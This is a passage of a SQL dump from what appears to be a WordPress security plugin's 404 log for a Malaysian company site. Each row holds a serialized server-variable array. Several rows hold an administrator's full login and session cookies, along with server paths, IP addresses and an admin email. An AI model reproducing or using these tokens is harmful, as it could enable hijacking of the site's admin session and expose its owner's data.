DR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLEBobUhCibXajp1P5yvgAAADk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569899526.7402\";s:12:\"REQUEST_TIME\";s:10:\"1569899526\";}}','notice','2019-10-01 03:12:09','2019-10-01 03:12:07',36002232,36258184,'https://bintara.com.my/%3C/div',1,1,'115.132.144.171'),(27383,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:60:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/%3C/div\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:2:\"55\";s:13:\"H2_STREAM_TAG\";s:5:\"84-55\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:39:\"image/webp,image/apng,image/*,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:619:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C784a989cce6fc638f30c138b2cb60f4abcf705119f9b4a888822333d868b7eb4; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C0e0191a2b294e19bb063e4cda4c45917d24fcb231acbe3e6dc43b6dee4653036; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569899457\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:74:\"https://bintara.com.my/?page_id=3606&elementor-preview=3606&ver=1569894964\";s:19:\"HTTP_SEC_FETCH_MODE\";s:7:\"no-cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:2:\"55\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"84-55\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/</div\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLEA4bUhCibXajp1P5yvQAAADc\";s:12:\"REDIRECT_URL\";s:6:\"/</div\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"65280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/</div\";s:10:\"SCRIPT_URL\";s:6:\"/</div\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLEA4bUhCibXajp1P5yvQAAADc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569899524.0449\";s:12:\"REQUEST_TIME\";s:10:\"1569899524\";}}','notice','2019-10-01 03:12:06','2019-10-01 03:12:04',36004224,36263432,'https://bintara.com.my/%3C/div',1,1,'115.132.144.171'),(27382,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E34B795A-D35D-40D0-BFB0-5B6A3112795A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZLBbYbUhCibXajp1P5x@wAAAE8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"55675\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZLBbYbUhCibXajp1P5x@wAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569898861.7475\";s:12:\"REQUEST_TIME\";s:10:\"1569898861\";}}','notice','2019-10-01 03:01:04','2019-10-01 03:01:02',35502424,37295776,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.171'),(27381,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZK83rnKqqU61Wxi9@HPZgAAAA0\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"41816\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZK83rnKqqU61Wxi9@HPZgAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569897695.0909\";s:12:\"REQUEST_TIME\";s:10:\"1569897695\";}}','notice','2019-10-01 02:41:37','2019-10-01 02:41:35',35144240,36952112,'https://bintara.com.my/information-security/',1,0,'216.244.66.228'),(27380,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/blog/tag/logitech-vc/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/blog/tag/logitech-vc/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZK0MrnKqqU61Wxi9@HHEQAAABQ\";s:12:\"REDIRECT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.33\";s:11:\"REMOTE_PORT\";s:4:\"3110\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/blog/tag/logitech-vc/feed/\";s:10:\"SCRIPT_URL\";s:27:\"/blog/tag/logitech-vc/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZK0MrnKqqU61Wxi9@HHEQAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569895474.4637\";s:12:\"REQUEST_TIME\";s:10:\"1569895474\";}}','notice','2019-10-01 02:04:37','2019-10-01 02:04:35',34060864,35862384,'https://bintara.com.my/blog/tag/logitech-vc/feed/',1,0,'40.77.167.33'),(27379,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"19-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:806:\"wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C9444f85318df5daa32e4905ef64a93e3d4bf3185374232826e3a5ac102c67c42; icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C784a989cce6fc638f30c138b2cb60f4abcf705119f9b4a888822333d868b7eb4; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C0e0191a2b294e19bb063e4cda4c45917d24fcb231acbe3e6dc43b6dee4653036; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569894023\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=3606&action=elementor&ip-geo-block-auth-nonce=6d30d4b00c\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"19-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZKy3rnKqqU61Wxi9@HFdwAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKy3rnKqqU61Wxi9@HFdwAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"64002\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKy3rnKqqU61Wxi9@HFdwAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569895134.8617\";s:12:\"REQUEST_TIME\";s:10:\"1569895134\";}}','notice','2019-10-01 01:58:57','2019-10-01 01:58:55',35904656,36158928,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'115.132.144.171'),(27378,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"160\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"9\";s:13:\"H2_STREAM_TAG\";s:4:\"24-9\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:806:\"wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C9444f85318df5daa32e4905ef64a93e3d4bf3185374232826e3a5ac102c67c42; icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1570065521%7CgZJe6gSy9tPjECNT75ExZ1wGGjI75DwYRWaD806k9FJ%7C784a989cce6fc638f30c138b2cb60f4abcf705119f9b4a888822333d868b7eb4; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C0e0191a2b294e19bb063e4cda4c45917d24fcb231acbe3e6dc43b6dee4653036; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-settings-time-1=1569894023\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:94:\"https://bintara.com.my/wp-admin/post-new.php?post_type=page&ip-geo-block-auth-nonce=6d30d4b00c\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"24-9\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZKyNbnKqqU61Wxi9@HEaAAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZKyNbnKqqU61Wxi9@HEaAAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.171\";s:11:\"REMOTE_PORT\";s:5:\"63875\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZKyNbnKqqU61Wxi9@HEaAAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569894965.5374\";s:12:\"REQUEST_TIME\";s:10:\"1569894965\";}}','notice','2019-10-01 01:56:08','2019-10-01 